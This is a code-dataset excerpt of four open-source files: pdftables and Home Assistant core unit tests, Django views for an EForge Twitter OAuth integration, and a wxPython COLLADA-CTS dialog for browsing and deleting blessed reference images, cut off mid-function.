repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---
pombredanne/pdftables | test/test_comb.py | 1 | 1990

#!/usr/bin/env python
# ScraperWiki Limited
# Ian Hopkinson, 2013-06-17
# -*- coding: utf-8 -*-
"""
comb tests
"""
import sys
sys.path.append('code')
from pdftables import (comb, comb_extend,
comb_from_uppers_and_lowers,
find_minima)
from nose.tools import assert_equals, raises
def test_find_minima_works_in_simplest_case():
projection = {5:2,6:1,7:2}
assert_equals(6,find_minima(7, 5, projection=projection))
def test_find_minima_function_copes_with_multiple_values_at_minima():
pass
def test_an_ascending_comb_is_extended_correctly():
combarray = [2, 3, 4]
assert_equals(
[1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0],
comb_extend(combarray, 0.1, 10.5))
def test_a_descending_comb_is_extended_correctly():
combarray = [5, 4, 3]
assert_equals(comb_extend(combarray, 0.1, 8), [7, 6, 5, 4, 3, 2, 1])
def test_it_returns_minus_one_for_values_below_comb():
combarray = [0, 1, 2, 3, 4, 5]
assert_equals(comb(combarray, -1), -1)
def test_it_returns_minus_one_for_values_above_comb():
combarray = [0, 1, 2, 3, 4, 5]
assert_equals(comb(combarray, 6), -1)
def test_it_returns_correct_index_comb_ascending():
combarray = [0, 1, 2, 3, 4, 5]
assert_equals(comb(combarray, 0.5), 0)
assert_equals(comb(combarray, 1.5), 1)
assert_equals(comb(combarray, 4.5), 4)
def test_it_returns_correct_index_comb_descending():
combarray = [5, 4, 3, 2, 1, 0]
assert_equals(comb(combarray, 0.5), 4)
assert_equals(comb(combarray, 1.5), 3)
assert_equals(comb(combarray, 4.5), 0)
def test_comb_correctly_created_from_uppers_and_lowers():
uppers = [100, 80, 60, 40, 20]
lowers = [86, 66, 46, 26, 6]
assert_equals(comb_from_uppers_and_lowers(uppers, lowers),
[100, 83, 63, 43, 23, 6])
@raises(Exception)
def test_raises_an_exception_for_an_unsorted_combarray():
combarray = [5, 3, 4, 2, 1, 0]
comb(combarray, 0.5)
| bsd-2-clause | 6,833,236,781,541,763,000 | 26.638889 | 72 | 0.622613 | false |
srcLurker/home-assistant | tests/test_core.py | 1 | 23404

"""Test to verify that Home Assistant core works."""
# pylint: disable=protected-access
import asyncio
import unittest
from unittest.mock import patch, MagicMock
from datetime import datetime, timedelta
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import InvalidEntityFormatError
from homeassistant.util.async import (
run_callback_threadsafe, run_coroutine_threadsafe)
import homeassistant.util.dt as dt_util
from homeassistant.util.unit_system import (METRIC_SYSTEM)
from homeassistant.const import (
__version__, EVENT_STATE_CHANGED, ATTR_FRIENDLY_NAME, CONF_UNIT_SYSTEM)
from tests.common import get_test_home_assistant
PST = pytz.timezone('America/Los_Angeles')
def test_split_entity_id():
"""Test split_entity_id."""
assert ha.split_entity_id('domain.object_id') == ['domain', 'object_id']
def test_async_add_job_schedule_callback():
"""Test that we schedule coroutines and add jobs to the job pool."""
hass = MagicMock()
job = MagicMock()
ha.HomeAssistant.async_add_job(hass, ha.callback(job))
assert len(hass.loop.call_soon.mock_calls) == 1
assert len(hass.loop.create_task.mock_calls) == 0
assert len(hass.add_job.mock_calls) == 0
@patch('asyncio.iscoroutinefunction', return_value=True)
def test_async_add_job_schedule_coroutinefunction(mock_iscoro):
"""Test that we schedule coroutines and add jobs to the job pool."""
hass = MagicMock()
job = MagicMock()
ha.HomeAssistant.async_add_job(hass, job)
assert len(hass.loop.call_soon.mock_calls) == 0
assert len(hass.loop.create_task.mock_calls) == 1
assert len(hass.add_job.mock_calls) == 0
@patch('asyncio.iscoroutinefunction', return_value=False)
def test_async_add_job_add_threaded_job_to_pool(mock_iscoro):
"""Test that we schedule coroutines and add jobs to the job pool."""
hass = MagicMock()
job = MagicMock()
ha.HomeAssistant.async_add_job(hass, job)
assert len(hass.loop.call_soon.mock_calls) == 0
assert len(hass.loop.create_task.mock_calls) == 0
assert len(hass.loop.run_in_executor.mock_calls) == 1
def test_async_run_job_calls_callback():
"""Test that the callback annotation is respected."""
hass = MagicMock()
calls = []
def job():
calls.append(1)
ha.HomeAssistant.async_run_job(hass, ha.callback(job))
assert len(calls) == 1
assert len(hass.async_add_job.mock_calls) == 0
def test_async_run_job_delegates_non_async():
"""Test that the callback annotation is respected."""
hass = MagicMock()
calls = []
def job():
calls.append(1)
ha.HomeAssistant.async_run_job(hass, job)
assert len(calls) == 0
assert len(hass.async_add_job.mock_calls) == 1
class TestHomeAssistant(unittest.TestCase):
"""Test the Home Assistant core classes."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
# This test hangs on `loop.add_signal_handler`
# def test_start_and_sigterm(self):
# """Start the test."""
# calls = []
# self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
# lambda event: calls.append(1))
# self.hass.start()
# self.assertEqual(1, len(calls))
# self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
# lambda event: calls.append(1))
# os.kill(os.getpid(), signal.SIGTERM)
# self.hass.block_till_done()
# self.assertEqual(1, len(calls))
def test_pending_scheduler(self):
"""Add a coro to pending tasks."""
call_count = []
@asyncio.coroutine
def test_coro():
"""Test Coro."""
call_count.append('call')
for i in range(50):
self.hass.add_job(test_coro())
run_coroutine_threadsafe(
asyncio.wait(self.hass._pending_tasks, loop=self.hass.loop),
loop=self.hass.loop
).result()
with patch.object(self.hass.loop, 'call_later') as mock_later:
run_callback_threadsafe(
self.hass.loop, self.hass._async_tasks_cleanup).result()
assert mock_later.called
assert len(self.hass._pending_tasks) == 0
assert len(call_count) == 50
def test_async_add_job_pending_tasks_coro(self):
"""Add a coro to pending tasks."""
call_count = []
@asyncio.coroutine
def test_coro():
"""Test Coro."""
call_count.append('call')
for i in range(50):
self.hass.add_job(test_coro())
assert len(self.hass._pending_tasks) == 50
self.hass.block_till_done()
assert len(call_count) == 50
def test_async_add_job_pending_tasks_executor(self):
"""Run a executor in pending tasks."""
call_count = []
def test_executor():
"""Test executor."""
call_count.append('call')
for i in range(40):
self.hass.add_job(test_executor)
assert len(self.hass._pending_tasks) == 40
self.hass.block_till_done()
assert len(call_count) == 40
def test_async_add_job_pending_tasks_callback(self):
"""Run a callback in pending tasks."""
call_count = []
@ha.callback
def test_callback():
"""Test callback."""
call_count.append('call')
for i in range(40):
self.hass.add_job(test_callback)
assert len(self.hass._pending_tasks) == 0
self.hass.block_till_done()
assert len(call_count) == 40
class TestEvent(unittest.TestCase):
"""A Test Event class."""
def test_eq(self):
"""Test events."""
now = dt_util.utcnow()
data = {'some': 'attr'}
event1, event2 = [
ha.Event('some_type', data, time_fired=now)
for _ in range(2)
]
self.assertEqual(event1, event2)
def test_repr(self):
"""Test that repr method works."""
self.assertEqual(
"<Event TestEvent[L]>",
str(ha.Event("TestEvent")))
self.assertEqual(
"<Event TestEvent[R]: beer=nice>",
str(ha.Event("TestEvent",
{"beer": "nice"},
ha.EventOrigin.remote)))
def test_as_dict(self):
"""Test as dictionary."""
event_type = 'some_type'
now = dt_util.utcnow()
data = {'some': 'attr'}
event = ha.Event(event_type, data, ha.EventOrigin.local, now)
expected = {
'event_type': event_type,
'data': data,
'origin': 'LOCAL',
'time_fired': now,
}
self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
"""Test EventBus methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.bus = self.hass.bus
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down stuff we started."""
self.hass.stop()
def test_add_remove_listener(self):
"""Test remove_listener method."""
self.hass.allow_pool = False
old_count = len(self.bus.listeners)
def listener(_): pass
unsub = self.bus.listen('test', listener)
self.assertEqual(old_count + 1, len(self.bus.listeners))
# Remove listener
unsub()
self.assertEqual(old_count, len(self.bus.listeners))
# Should do nothing now
unsub()
def test_unsubscribe_listener(self):
"""Test unsubscribe listener from returned function."""
calls = []
@ha.callback
def listener(event):
"""Mock listener."""
calls.append(event)
unsub = self.bus.listen('test', listener)
self.bus.fire('test')
self.hass.block_till_done()
assert len(calls) == 1
unsub()
self.bus.fire('event')
self.hass.block_till_done()
assert len(calls) == 1
def test_listen_once_event_with_callback(self):
"""Test listen_once_event method."""
runs = []
@ha.callback
def event_handler(event):
runs.append(event)
self.bus.listen_once('test_event', event_handler)
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(runs))
def test_listen_once_event_with_coroutine(self):
"""Test listen_once_event method."""
runs = []
@asyncio.coroutine
def event_handler(event):
runs.append(event)
self.bus.listen_once('test_event', event_handler)
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(runs))
def test_listen_once_event_with_thread(self):
"""Test listen_once_event method."""
runs = []
def event_handler(event):
runs.append(event)
self.bus.listen_once('test_event', event_handler)
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(runs))
def test_thread_event_listener(self):
"""Test a event listener listeners."""
thread_calls = []
def thread_listener(event):
thread_calls.append(event)
self.bus.listen('test_thread', thread_listener)
self.bus.fire('test_thread')
self.hass.block_till_done()
assert len(thread_calls) == 1
def test_callback_event_listener(self):
"""Test a event listener listeners."""
callback_calls = []
@ha.callback
def callback_listener(event):
callback_calls.append(event)
self.bus.listen('test_callback', callback_listener)
self.bus.fire('test_callback')
self.hass.block_till_done()
assert len(callback_calls) == 1
def test_coroutine_event_listener(self):
"""Test a event listener listeners."""
coroutine_calls = []
@asyncio.coroutine
def coroutine_listener(event):
coroutine_calls.append(event)
self.bus.listen('test_coroutine', coroutine_listener)
self.bus.fire('test_coroutine')
self.hass.block_till_done()
assert len(coroutine_calls) == 1
class TestState(unittest.TestCase):
"""Test State methods."""
def test_init(self):
"""Test state.init."""
self.assertRaises(
InvalidEntityFormatError, ha.State,
'invalid_entity_format', 'test_state')
def test_domain(self):
"""Test domain."""
state = ha.State('some_domain.hello', 'world')
self.assertEqual('some_domain', state.domain)
def test_object_id(self):
"""Test object ID."""
state = ha.State('domain.hello', 'world')
self.assertEqual('hello', state.object_id)
def test_name_if_no_friendly_name_attr(self):
"""Test if there is no friendly name."""
state = ha.State('domain.hello_world', 'world')
self.assertEqual('hello world', state.name)
def test_name_if_friendly_name_attr(self):
"""Test if there is a friendly name."""
name = 'Some Unique Name'
state = ha.State('domain.hello_world', 'world',
{ATTR_FRIENDLY_NAME: name})
self.assertEqual(name, state.name)
def test_dict_conversion(self):
"""Test conversion of dict."""
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, ha.State.from_dict(state.as_dict()))
def test_dict_conversion_with_wrong_data(self):
"""Test conversion with wrong data."""
self.assertIsNone(ha.State.from_dict(None))
self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))
def test_repr(self):
"""Test state.repr."""
self.assertEqual("<state happy.happy=on @ 1984-12-08T12:00:00+00:00>",
str(ha.State(
"happy.happy", "on",
last_changed=datetime(1984, 12, 8, 12, 0, 0))))
self.assertEqual(
"<state happy.happy=on; brightness=144 @ "
"1984-12-08T12:00:00+00:00>",
str(ha.State("happy.happy", "on", {"brightness": 144},
datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
"""Test State machine methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.states = self.hass.states
self.states.set("light.Bowl", "on")
self.states.set("switch.AC", "off")
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down stuff we started."""
self.hass.stop()
def test_is_state(self):
"""Test is_state method."""
self.assertTrue(self.states.is_state('light.Bowl', 'on'))
self.assertFalse(self.states.is_state('light.Bowl', 'off'))
self.assertFalse(self.states.is_state('light.Non_existing', 'on'))
def test_is_state_attr(self):
"""Test is_state_attr method."""
self.states.set("light.Bowl", "on", {"brightness": 100})
self.assertTrue(
self.states.is_state_attr('light.Bowl', 'brightness', 100))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 200))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 'Bowl'))
self.assertFalse(
self.states.is_state_attr('light.Non_existing', 'brightness', 100))
def test_entity_ids(self):
"""Test get_entity_ids method."""
ent_ids = self.states.entity_ids()
self.assertEqual(2, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
self.assertTrue('switch.ac' in ent_ids)
ent_ids = self.states.entity_ids('light')
self.assertEqual(1, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
def test_all(self):
"""Test everything."""
states = sorted(state.entity_id for state in self.states.all())
self.assertEqual(['light.bowl', 'switch.ac'], states)
def test_remove(self):
"""Test remove method."""
events = []
@ha.callback
def callback(event):
events.append(event)
self.hass.bus.listen(EVENT_STATE_CHANGED, callback)
self.assertIn('light.bowl', self.states.entity_ids())
self.assertTrue(self.states.remove('light.bowl'))
self.hass.block_till_done()
self.assertNotIn('light.bowl', self.states.entity_ids())
self.assertEqual(1, len(events))
self.assertEqual('light.bowl', events[0].data.get('entity_id'))
self.assertIsNotNone(events[0].data.get('old_state'))
self.assertEqual('light.bowl', events[0].data['old_state'].entity_id)
self.assertIsNone(events[0].data.get('new_state'))
# If it does not exist, we should get False
self.assertFalse(self.states.remove('light.Bowl'))
self.hass.block_till_done()
self.assertEqual(1, len(events))
def test_case_insensitivity(self):
"""Test case insensitivity."""
runs = []
@ha.callback
def callback(event):
runs.append(event)
self.hass.bus.listen(EVENT_STATE_CHANGED, callback)
self.states.set('light.BOWL', 'off')
self.hass.block_till_done()
self.assertTrue(self.states.is_state('light.bowl', 'off'))
self.assertEqual(1, len(runs))
def test_last_changed_not_updated_on_same_state(self):
"""Test to not update the existing, same state."""
state = self.states.get('light.Bowl')
future = dt_util.utcnow() + timedelta(hours=10)
with patch('homeassistant.util.dt.utcnow', return_value=future):
self.states.set("light.Bowl", "on", {'attr': 'triggers_change'})
self.hass.block_till_done()
state2 = self.states.get('light.Bowl')
assert state2 is not None
assert state.last_changed == state2.last_changed
def test_force_update(self):
"""Test force update option."""
events = []
@ha.callback
def callback(event):
events.append(event)
self.hass.bus.listen(EVENT_STATE_CHANGED, callback)
self.states.set('light.bowl', 'on')
self.hass.block_till_done()
self.assertEqual(0, len(events))
self.states.set('light.bowl', 'on', None, True)
self.hass.block_till_done()
self.assertEqual(1, len(events))
class TestServiceCall(unittest.TestCase):
"""Test ServiceCall class."""
def test_repr(self):
"""Test repr method."""
self.assertEqual(
"<ServiceCall homeassistant.start>",
str(ha.ServiceCall('homeassistant', 'start')))
self.assertEqual(
"<ServiceCall homeassistant.start: fast=yes>",
str(ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})))
class TestServiceRegistry(unittest.TestCase):
"""Test ServicerRegistry methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.services = self.hass.services
@ha.callback
def mock_service(call):
pass
self.services.register("Test_Domain", "TEST_SERVICE", mock_service)
# pylint: disable=invalid-name
def tearDown(self):
"""Stop down stuff we started."""
self.hass.stop()
def test_has_service(self):
"""Test has_service method."""
self.assertTrue(
self.services.has_service("tesT_domaiN", "tesT_servicE"))
self.assertFalse(
self.services.has_service("test_domain", "non_existing"))
self.assertFalse(
self.services.has_service("non_existing", "test_service"))
def test_services(self):
"""Test services."""
expected = {
'test_domain': {'test_service': {'description': '', 'fields': {}}}
}
self.assertEqual(expected, self.services.services)
def test_call_with_blocking_done_in_time(self):
"""Test call with blocking."""
calls = []
@ha.callback
def service_handler(call):
"""Service handler."""
calls.append(call)
self.services.register("test_domain", "register_calls",
service_handler)
self.assertTrue(
self.services.call('test_domain', 'REGISTER_CALLS', blocking=True))
self.assertEqual(1, len(calls))
def test_call_non_existing_with_blocking(self):
"""Test non-existing with blocking."""
prior = ha.SERVICE_CALL_LIMIT
try:
ha.SERVICE_CALL_LIMIT = 0.01
assert not self.services.call('test_domain', 'i_do_not_exist',
blocking=True)
finally:
ha.SERVICE_CALL_LIMIT = prior
def test_async_service(self):
"""Test registering and calling an async service."""
calls = []
@asyncio.coroutine
def service_handler(call):
"""Service handler coroutine."""
calls.append(call)
self.services.register('test_domain', 'register_calls',
service_handler)
self.assertTrue(
self.services.call('test_domain', 'REGISTER_CALLS', blocking=True))
self.hass.block_till_done()
self.assertEqual(1, len(calls))
def test_callback_service(self):
"""Test registering and calling an async service."""
calls = []
@ha.callback
def service_handler(call):
"""Service handler coroutine."""
calls.append(call)
self.services.register('test_domain', 'register_calls',
service_handler)
self.assertTrue(
self.services.call('test_domain', 'REGISTER_CALLS', blocking=True))
self.hass.block_till_done()
self.assertEqual(1, len(calls))
class TestConfig(unittest.TestCase):
"""Test configuration methods."""
# pylint: disable=invalid-name
def setUp(self):
"""Setup things to be run when tests are started."""
self.config = ha.Config()
self.assertIsNone(self.config.config_dir)
def test_path_with_file(self):
"""Test get_config_path method."""
self.config.config_dir = '/tmp/ha-config'
self.assertEqual("/tmp/ha-config/test.conf",
self.config.path("test.conf"))
def test_path_with_dir_and_file(self):
"""Test get_config_path method."""
self.config.config_dir = '/tmp/ha-config'
self.assertEqual("/tmp/ha-config/dir/test.conf",
self.config.path("dir", "test.conf"))
def test_as_dict(self):
"""Test as dict."""
self.config.config_dir = '/tmp/ha-config'
expected = {
'latitude': None,
'longitude': None,
CONF_UNIT_SYSTEM: METRIC_SYSTEM.as_dict(),
'location_name': None,
'time_zone': 'UTC',
'components': [],
'config_dir': '/tmp/ha-config',
'version': __version__,
}
self.assertEqual(expected, self.config.as_dict())
class TestAsyncCreateTimer(object):
"""Test create timer."""
@patch('homeassistant.core.asyncio.Event')
@patch('homeassistant.core.dt_util.utcnow')
def test_create_timer(self, mock_utcnow, mock_event, event_loop):
"""Test create timer fires correctly."""
hass = MagicMock()
now = mock_utcnow()
event = mock_event()
now.second = 1
mock_utcnow.reset_mock()
ha._async_create_timer(hass)
assert len(hass.bus.async_listen_once.mock_calls) == 2
start_timer = hass.bus.async_listen_once.mock_calls[1][1][1]
event_loop.run_until_complete(start_timer(None))
assert hass.loop.create_task.called
timer = hass.loop.create_task.mock_calls[0][1][0]
event.is_set.side_effect = False, False, True
event_loop.run_until_complete(timer)
assert len(mock_utcnow.mock_calls) == 1
assert hass.loop.call_soon.called
event_type, event_data = hass.loop.call_soon.mock_calls[0][1][1:]
assert ha.EVENT_TIME_CHANGED == event_type
assert {ha.ATTR_NOW: now} == event_data
stop_timer = hass.bus.async_listen_once.mock_calls[0][1][1]
stop_timer(None)
assert event.set.called
| mit | -2,077,596,494,842,952,200 | 30.499327 | 79 | 0.587079 | false |
oshepherd/eforge | eforge/update/twitter/views.py | 1 | 3164

# -*- coding: utf-8 -*-
# EForge project management system, Copyright © 2010, Element43
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from eforge.models import Project
from django.shortcuts import redirect, render_to_response
from django.template import RequestContext
from django.core.urlresolvers import reverse
from django.conf import settings
from django.contrib.sites.models import Site
from eforge.decorators import project_page, has_project_perm
from eforge.update.twitter.models import Token
from twitter import Twitter, OAuth, TwitterHTTPError
import urlparse
consumer_key = settings.TWITTER_CONSUMER_KEY
consumer_secret = settings.TWITTER_CONSUMER_SECRET
authorize_url = 'https://api.twitter.com/oauth/authorize?oauth_token=%s'
def abs_reverse(*args, **kwargs):
domain = "http://%s" % Site.objects.get_current().domain
return urlparse.urljoin(domain, reverse(*args, **kwargs))
@project_page
@has_project_perm('eforge.manage')
def setup(request, project):
twitter = Twitter(
auth=OAuth('', '', consumer_key, consumer_secret),
format='', secure=True,)
tokens = urlparse.parse_qs(
twitter.oauth.request_token(
oauth_callback=abs_reverse('twitter-callback', args=[project.slug])
))
print tokens
request.session['oauth_secret'] = tokens['oauth_token_secret'][0]
return redirect(authorize_url % tokens['oauth_token'][0])
@project_page
@has_project_perm('eforge.manage')
def callback(request, project):
oauth_token = request.GET['oauth_token']
oauth_verifier = request.GET['oauth_verifier']
oauth_secret = request.session['oauth_secret']
print request.session.items()
twitter = Twitter(
auth=OAuth(oauth_token, oauth_secret, consumer_key, consumer_secret),
format='', secure=True,)
try:
tokens = urlparse.parse_qs(
twitter.oauth.access_token(oauth_verifier=oauth_verifier))
except TwitterHTTPError, e:
print e
raise
try:
token = Token.objects.get(project=project)
except Token.DoesNotExist:
token = Token(project=project)
token.token = tokens['oauth_token'][0]
token.token_secret = tokens['oauth_token_secret'][0]
token.user = tokens['screen_name'][0]
token.save()
return render_to_response('twitter/done.html', {
'name': tokens['screen_name'][0]
}, context_instance=RequestContext(request))
| isc | 3,334,641,479,672,096,000 | 35.790698 | 79 | 0.702498 | false |
KhronosGroup/COLLADA-CTS | Core/Gui/Dialog/FBlessedViewerDialog.py | 1 | 11440

# Copyright (c) 2012 The Khronos Group Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Materials.
# THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
import wx
import os
import os.path
import shutil
import Core.Common.FUtils as FUtils
from Core.Common.FConstants import *
from Core.Gui.Dialog.FImageSizer import *
class FBlessedViewerDialog(wx.Dialog):
def __init__(self, parent, dataSetPath):
wx.Dialog.__init__(self, parent, wx.ID_ANY,
"Blessed Viewer", size = wx.Size(540, 450),
style = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)
sizer = wx.BoxSizer()
self.SetSizer(sizer)
window = wx.SplitterWindow(self)
window.SetSashGravity(0.5)
window.SetMinimumPaneSize(20)
images = FBlessedImagesPanel(window, dataSetPath)
names = FBlessedNamesPanel(window, dataSetPath, images)
window.SplitVertically(names, images, 200)
sizer.Add(window, 1, wx.EXPAND | wx.ALL, 0)
class FBlessedNamesPanel(wx.Panel):
def __init__(self, parent, dataSetPath, imagesPanel):
wx.Panel.__init__(self, parent, style = wx.BORDER_SUNKEN)
self.__dataSetPath = dataSetPath
self.__imagesPanel = imagesPanel
self.__imagesPanel.SetChangeCallback(self.__Update)
self.__defaultBlessedImageFilename = ""
sizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(sizer)
# UI: Add a label for the default blessed image filename.
defaultBlessedLabel = wx.StaticText(self, wx.ID_ANY, " Default Blessed")
sizer.Add(defaultBlessedLabel, 0, wx.ALIGN_LEFT | wx.ALL, 2)
# UI: Add a text box with the default blessed image filename at the top.
self.__defaultImageTextBox = wx.TextCtrl(self, wx.ID_ANY, style = wx.TE_READONLY)
sizer.Add(self.__defaultImageTextBox, 0, wx.EXPAND | wx.ALL, 2)
sizer.Add((1, 5), 0)
# UI: Add a label for the blessed images list box.
imageLabel = wx.StaticText(self, wx.ID_ANY, " Blessed Images/Animations")
sizer.Add(imageLabel, 0, wx.ALIGN_LEFT | wx.ALL, 2)
# UI: Add a list box containing all the bless image filenames.
self.__imageListBox = wx.ListBox(self, style = wx.LB_SINGLE | wx.LB_HSCROLL)
self.Bind(wx.EVT_LISTBOX, self.__ImageOnClick, self.__imageListBox)
sizer.Add(self.__imageListBox, 1, wx.EXPAND | wx.ALL, 2)
self.__Update(False)
# returns [(imageName, imagePath),]
def __GetImageList(self):
blessedImages = []
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR)
if (os.path.isdir(blessedDir)):
for ext in os.listdir(blessedDir):
if (ext[0] == "."): continue # mostly for .svn folders
if (ext == BLESSED_EXECUTIONS): continue
extBlessedDir = os.path.join(blessedDir, ext)
if (os.path.isdir(extBlessedDir)):
for filename in os.listdir(extBlessedDir):
fullFilename = os.path.join(extBlessedDir, filename)
if (os.path.isfile(fullFilename)):
blessedImages.append((filename, fullFilename))
return blessedImages
# returns [(animationName, [imagePath1,]), ]
def __GetAnimationList(self):
blessedAnimations = []
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR, BLESSED_ANIMATIONS)
if (os.path.isdir(blessedDir)):
for directory in os.listdir(blessedDir):
if (directory[0] == "."): continue # mostly for .svn folders
fullDirectory = os.path.join(blessedDir, directory)
storedFilenames = []
for filename in os.listdir(fullDirectory):
fullFilename = os.path.join(fullDirectory, filename)
if (os.path.isfile(fullFilename)):
storedFilenames.append(fullFilename)
storedFilenames.sort()
blessedAnimations.append((directory, storedFilenames))
return blessedAnimations
def __Update(self, onlyDefaultBless):
# Update the default blessed image filename.
defaultContainerFilename = os.path.join(self.__dataSetPath, BLESSED_DIR, BLESSED_DEFAULT_FILE)
if (os.path.isfile(defaultContainerFilename)):
blessFile = open(defaultContainerFilename, "rb")
filename = blessFile.readline().strip()
blessFile.close()
if (filename.find(BLESSED_ANIMATIONS) == -1): # Image?
filename = os.path.basename(filename)
else:
filename = os.path.basename(os.path.dirname(filename))
self.__defaultImageTextBox.SetLabel(filename)
else:
self.__defaultImageTextBox.SetLabel("")
if onlyDefaultBless: return
# Update the image filenames list box.
self.__imageListBox.Clear()
for name, image in self.__GetImageList():
self.__imageListBox.Append("[I] " + name, [image])
for name, images in self.__GetAnimationList():
self.__imageListBox.Append("[A] " + name, images)
# Restart the images panel
if (self.__imageListBox.GetCount() > 0):
self.__imageListBox.Select(0)
self.__imagesPanel.SetImage(self.__imageListBox.GetClientData(0))
else:
self.__imagesPanel.Clear()
def __ImageOnClick(self, e):
e.Skip()
selection = self.__imageListBox.GetSelection()
if (selection == -1): return
self.__imagesPanel.SetImage(self.__imageListBox.GetClientData(selection))
class FBlessedImagesPanel(wx.Panel):
def __init__(self, parent, dataSetPath):
wx.Panel.__init__(self, parent, style = wx.BORDER_SUNKEN)
self.__filenames = None
self.__callback = None
self.__animationSizer = None
self.__dataSetPath = dataSetPath
sizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(sizer)
self.Clear()
sizer.Layout()
def Clear(self):
sizer = self.GetSizer()
# for some reason Clear() does not destroy the static box
if (self.__animationSizer != None):
sizer.Detach(self.__animationSizer)
self.__animationSizer.DeleteWindows()
self.__animationSizer.GetStaticBox().Destroy()
self.__animationSizer = None
self.GetSizer().Clear(True)
self.GetSizer().Layout()
def SetImage(self, filenames):
sizer = self.GetSizer()
self.Clear()
self.__filenames = filenames
self.__animationSizer = FImageSizer(self, wx.EmptyString, filenames, None)
sizer.Add(self.__animationSizer, 0, wx.ALIGN_CENTER | wx.ALL, 2)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(buttonSizer, 0, wx.ALIGN_CENTER | wx.ALL, 2)
button = wx.Button(self, wx.ID_ANY, "Delete")
buttonSizer.Add(button, 0, wx.ALIGN_CENTER | wx.ALL, 2)
self.Bind(wx.EVT_BUTTON, self.__OnUnbless, button)
button = wx.Button(self, wx.ID_ANY, "Default Bless")
buttonSizer.Add(button, 0, wx.ALIGN_CENTER | wx.ALL, 2)
self.Bind(wx.EVT_BUTTON, self.__OnMakeDefault, button)
buttonSizer.Layout()
sizer.Layout()
def SetChangeCallback(self, callback):
self.__callback = callback
def __OnUnbless(self, e):
e.Skip()
# Delete the blessed image files.
for filename in self.__filenames:
os.remove(filename)
foundFile = False
for element in os.listdir(os.path.dirname(filename)):
if (element != ".svn"):
foundFile = True
break
if (not foundFile):
deleteDirectory = os.path.abspath(os.path.dirname(filename))
try:
shutil.rmtree(deleteDirectory)
except OSError, e:
FUtils.ShowWarning(self, "Unable to delete " + deleteDirectory + ".\n" +
"Error:\n" + str(e) + "\n Please delete directory manually.")
# Verify whether this was the blessed images. In that case: clear the file.
blessedDir = os.path.join(self.__dataSetPath, BLESSED_DIR)
defaultContainerFilename = os.path.join(blessedDir, BLESSED_DEFAULT_FILE)
if (os.path.isfile(defaultContainerFilename)):
blessFile = open(defaultContainerFilename, "rb")
defaultBlessedImageFilename = blessFile.readline().strip()
blessFile.close()
# Need to compare absolute filenames.
if (len(defaultBlessedImageFilename) > 0):
defaultBlessedImageFilename = os.path.join(blessedDir, defaultBlessedImageFilename)
